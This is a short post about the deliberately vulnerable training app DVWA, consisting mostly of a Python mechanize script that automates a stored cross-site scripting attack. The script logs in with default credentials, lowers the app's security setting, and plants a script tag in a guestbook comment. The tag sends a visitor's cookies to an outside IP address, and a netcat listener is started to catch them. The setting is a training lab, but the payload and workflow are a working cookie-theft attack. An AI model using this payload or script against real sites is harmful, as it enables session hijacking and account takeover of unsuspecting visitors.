Damn Vulnerable Web Application (DVWA) is an intentionally vulnerable web application used for training. DVWA is also one of the web applications on the OWASP Broken Web Applications Virtual Machine. This post is nothing more than a script that automates the exploitation of the stored cross site scripting vulnerability using Python’s mechanize module for browser automation. The script injects a cookie-stealing payload into a vulnerable form, and sets up a listener to catch the cookie when a victim visits the page.
#Tested on Windows against DVWA within the OWASP Broken Web App VM Version 1.2 import mechanize import sys import os uname = "admin" pword = "admin" rhost = sys.argv[1] br = mechanize.Browser() def loginAndReset(username,password): """Logs into DVWA and sets security to low""" br.open("http://" + rhost + "/dvwa/login.php") br.select_form(nr=0) br.form['username']= username br.form['password']= password br.submit() #submit the form br.follow_link(url_regex=r'security.php') br.select_form(nr=0) #selects the form br.form['security'] = ["low"] br.submit() def storedXss(): """Injects the xss payload into the form""" br.open("http://" + rhost + "/dvwa/vulnerabilities/xss_s") br.select_form(nr=0) br.form['txtName']= "Jake" br.form['mtxMessage']= "Really cool stuff! Keep up the good work!<script>document.location='http://192.168.0.3:4444/cgi-bin/grab.cgi?'+document.cookie;</script>" br.submit() def listener(): """Starts a listener to catch the cookie""" os.system(r'start cmd.exe /k "nc -nlvp 4444"') def main(): loginAndReset(uname, pword) storedXss() listener() if __name__ == '__main__': main()